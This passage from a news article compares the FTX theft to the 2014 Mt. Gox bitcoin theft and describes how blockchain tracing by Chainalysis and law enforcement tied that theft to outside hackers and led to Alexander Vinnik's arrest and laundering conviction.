As the questions mount over whether—or to what degree—FTX's own management might be responsible for the theft, the case has begun to resemble, more than any recent crypto heist, a very old one: the theft of a half billion dollars worth of bitcoins, discovered in 2014, from Mt. Gox, the first cryptocurrency exchange. In that case, blockchain analysis carried out by cryptocurrency tracing firm Chainalysis, along with law enforcement, helped to pin the theft on external hackers rather than Mt. Gox's own staff. Eventually, Alexander Vinnik, a Russian man, was arrested in Greece in 2017 and later convicted of laundering the stolen Mt. Gox funds, exonerating Mt. Gox's embattled executives.

Whether history will repeat itself, and cryptocurrency tracing will prove the innocence of FTX's staff, remains far from clear. But as more eyes than ever scour the cryptocurrency economy's blockchains, it's a surer bet that the whodunit behind the FTX theft will, sooner or later, produce an answer.

Tag

#backdoor